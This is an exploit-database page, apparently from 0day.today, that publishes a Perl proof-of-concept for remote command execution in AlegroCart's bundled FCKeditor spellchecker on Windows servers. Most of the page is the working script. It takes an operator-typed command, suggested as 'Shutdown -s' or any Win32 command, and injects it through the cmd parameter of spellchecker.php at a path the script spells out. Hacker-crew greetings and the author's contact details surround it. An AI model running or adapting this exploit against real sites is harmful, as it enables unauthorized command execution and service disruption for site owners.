0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AlegroCart FredCK-Editor (ASPELL for WinSRV) Remote Command Exec
[1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : AlegroCart FredCK-Editor (ASPELL for WinSRV) Remote Command Exec p0c
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com) kedans@facebook.com
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# Facebook : http://facebook.com/KedAns
# Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com
# platform : php
# Type : Remote Command Exec ( Just For Windows SRV's)
# Security Risk : Highe
# Tested on : Windows XP-SP3 (Fr)
###
##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |
# | ------------------------------------------------- < |
##
# // Exploit-ID Team Welc0m BaCk Br0thEr'S <3 (exploit-id.com) <3
#-> About thE p0c :
+ this p0c about exeC s0me Command's as (spellchecker.php) t0 aspell.exe script !
Working just in Windows Servers Couse Is Desactived in Linux ServerS :::>
["'''''''''''''''''''''''
# my $aspell_cmd = 'aspell'; # by FredCK (for Linux)
my $aspell_cmd = '"C:\Program Files\Aspell\bin\aspell.exe"'; # by FredCK (for Windows)
'''''''''''''''''''''''''"]
"" spellchecker.php | Line 11->12
// Sp ThanX t0 ' T0x!c ' ( Real BuG by Him >> http://exploit.dis9.com/exploits.php?id=104 )
# Exploit Code :
#!/usr/bin/perl
system("cls");
sub logo(){
print q'
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1 ______ 0
0 .-" "-. 1
1 / KedAns-Dz \ =-=-=-=-=-=-=-=-=-=-=-| 0
0 Inj3ct0r & Dis9 | & T0x!c | > Site : 1337day.com | 1
1 --------------- |, .-. .-. ,| > Facebook : /kedans | 0
0 | )(_o/ \o_)( | > ked-h@hotmail.com | 1
1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=| 0
0 (@_ (_ ^^ _) Algerian HaCkerS 1
1 _ ) \_______\__|IIIIII|__/_______________________ 0
0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1
1 )_/ \ / 0
0 (@ `--------` © 2012, Inj3ct0r Team | Dis9 UE Team 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0 AlegroCart FredCK-Editor (ASPELL for WinSRV) Remote Command Exec p0c 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
';
}
logo();
print "\n [*] Usage: $0 127.0.0.1\n\n";
print " [+] Command : win.ini | 0r | Shutdown -s | 0r any WIN32 CMD's \n\n";
$ARGC=@ARGV;
if ($ARGC!=1) {
print "\n [*] f.ex: $0 http://[p0cTrGt].[Tld]\n\n";
exit(0);
}
use LWP::Simple;
use LWP::UserAgent;
my $target = shift;
print "\n [+] Command : ";
$CMD = <stdin>;
print " ~~~~~~~~~~~~~~~\n";
$act = "admin/javascript/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?cmd=";
$attack = get("http://" .$target. "/".$act.$CMD);
print "\n [+] Execute the Command ...\n";
print "\n [+] p0c by KedAns-Dz ThanX t0 T0x!C ^___^\n";
sleep(1000);
# The EnD ./ Greetings t0 palestine ./ ^__^ Like aNd Inj0Y
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=======================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Rizky Ariestiyansyah * Islam Caddy * HMD-Cr3w
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n *
# Angel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * r00tw0rm.com * Dis9UE
# www.packetstormsecurity.org * www.metasploit.com * I-BackTrack * All Security and Exploits Webs ..
#===================================================================================================
# 0day.today [2024-12-28] #